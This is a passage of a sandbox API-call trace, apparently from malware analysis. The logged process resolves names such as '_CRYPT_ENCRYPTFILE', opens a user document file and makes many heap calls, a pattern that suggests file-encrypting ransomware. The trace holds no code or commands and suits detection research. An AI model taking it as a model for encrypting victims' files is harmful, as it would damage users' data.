lpsz="_WINAPI_FILEINUSE") returned 0x11 [0084.312] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0084.312] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0084.312] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.312] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43cad78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0084.312] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\fd1hvy\\documents\\my shapes\\_private\\folder.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0084.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0084.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e95f0 [0084.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0084.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0084.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0084.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0084.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0084.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0084.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0084.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0084.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0084.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e310 [0084.413] FreeLibrary (hLibModule=0x772d0000) returned 1 [0084.413] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0084.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0084.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0084.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0084.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0084.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa18 [0084.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43caa18, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0084.413] CloseHandle (hObject=0x298) returned 1 [0084.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0084.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e93c8 [0084.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0084.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0084.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0084.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0084.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0084.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0084.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0084.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0084.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0084.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0084.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0084.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0084.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0084.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0084.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0084.414] FreeLibrary (hLibModule=0x772d0000) returned 1 [0084.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0084.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0084.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0084.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0084.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0084.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0084.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0084.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0084.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0084.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0084.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0084.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0084.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0084.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0084.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0084.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0084.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0084.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0084.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0084.415] PeekMessageW (in: lpMsg=0x144ec64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec64) returned 0 [0084.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0084.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0084.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0084.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0084.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0084.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0084.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0084.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0084.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0084.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0084.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0084.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0084.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0084.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0084.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0084.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0084.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0084.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0084.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0084.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0084.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0084.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0084.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0084.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0084.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0084.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0084.416] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0084.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0084.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e70 [0084.416] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0084.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e70 | out: hHeap=0x1780000) returned 1 [0084.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0084.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0084.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2680 [0084.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0084.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0084.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0084.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0084.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0084.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2700 [0084.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0084.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0084.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0084.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0084.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0084.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0084.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0084.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4d00 [0084.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0084.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0084.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0084.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0084.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2690 [0084.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0084.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0084.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0084.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0084.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2540 [0084.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0084.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0084.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0084.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6e8 [0084.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0084.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0084.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0084.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0084.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0084.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0084.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0084.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0084.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0084.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0084.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0084.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e70 [0084.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0084.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0084.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0084.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0084.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0084.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0084.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0084.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0084.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0084.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0084.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0084.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0084.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0084.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0084.419] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0084.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0084.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0084.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0084.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0084.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0084.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0084.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0084.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0084.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0084.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0084.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0084.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0084.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0084.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0084.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0084.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0084.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0084.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0084.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0084.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0084.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0084.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0084.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0084.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0084.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0084.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0084.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0084.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0084.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0084.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0084.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0084.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0084.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0084.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0084.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0084.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0084.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0084.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0084.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0084.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0084.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0084.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0084.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0084.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0084.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0084.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0084.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0084.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0084.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0084.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0084.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0084.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0084.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0084.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0084.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0084.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0084.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0084.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0084.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0084.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0084.422] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\folder.ico", lpFindFileData=0x144e878 | out: lpFindFileData=0x144e878*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xc1bc4716, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xc1bc4716, ftLastAccessTime.dwHighDateTime=0x1d47c35, ftLastWriteTime.dwLowDateTime=0xc1bea8c6, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="folder.ico", cAlternateFileName="")) returned 0x41ac640 [0084.422] FindClose (in: hFindFile=0x41ac640 | out: hFindFile=0x41ac640) returned 1 [0084.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0084.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0084.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0084.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0084.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0084.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0084.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0084.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0084.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0084.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0084.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0084.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0084.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0084.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0084.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0084.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0084.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0084.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0084.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0084.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: 